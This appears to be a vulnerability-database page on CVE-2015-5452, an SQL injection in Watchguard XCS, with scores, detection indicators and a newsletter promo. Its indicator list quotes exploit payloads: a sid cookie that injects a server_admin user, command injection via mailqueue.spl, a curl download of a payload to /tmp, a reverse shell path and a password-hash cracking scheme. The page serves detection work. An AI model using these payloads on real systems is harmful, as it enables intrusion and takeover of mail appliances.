cbcvebase.
CVE-2015-5452
published 2015-07-08

CVE-2015-5452: SQL injection vulnerability in Watchguard XCS 9.2 and 10.0 before build 150522 allows remote attackers to execute arbitrary SQL commands via the sid cookie, as…

PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.42%
87.4th percentile
SQL injection vulnerability in Watchguard XCS 9.2 and 10.0 before build 150522 allows remote attackers to execute arbitrary SQL commands via the sid cookie, as demonstrated by a request to borderpost/imp/compose.php3.

Affected

2 ranges
VendorProductVersion rangeFixed in
watchguardxcs
watchguardxcs

Detection & IOCsextracted from sources · hover to see the quote

path/borderpost/imp/compose.php3
cookiesid=1'
cookiesid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--
path/ADMIN/mailqueue.spl
path/login.spl
command/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}
path/tmp/revshell
  • Detect SQLi exploitation attempts via the 'sid' cookie on /borderpost/imp/compose.php3 — look for SQL metacharacters (single quote, semicolon, INSERT, --) in the sid cookie value.
  • A vulnerable host will return the string 'unterminated quoted string' in the HTTP response body when probed with sid=1' — use this as a fingerprint for the check.
  • Detect command injection exploitation via GET requests to /ADMIN/mailqueue.spl with the 'id' parameter containing a leading semicolon (e.g., id=;id or id=;/usr/local/sbin/curl).
  • Successful command injection as 'nobody' (uid=65534) can be confirmed by the string 'uid=65534' appearing in the HTTP response body.
  • Monitor for outbound curl requests from the appliance to external hosts (curl -k) followed by chmod +x and execution of a binary dropped in /tmp — indicative of payload delivery stage.
  • Alert on INSERT SQL statements injected into the sid cookie targeting the sds_users table, particularly inserting a user with priv_level='server_admin'.
  • The XCS password hash uses a known salting scheme: MD5('BorderWare ' + password + ' some other random (9) stuff'), then MD5(password + first_hash). Detect or crack hashes using this scheme.
  • ·The exploit requires SSL (HTTPS on port 443) to communicate with the target appliance.
  • ·The Metasploit module targets a 64-bit BSD platform (ARCH_X86_64); payload must be a native BSD payload or generation will fail.
  • ·The command injection executes as the 'nobody' user (uid=65534), not root — privilege escalation is a separate step (e.g., via cron job running /tmp/revshell as root).
  • ·The fix is Build 150522; only Watchguard XCS versions 9.2 and 10.0 prior to this build are affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.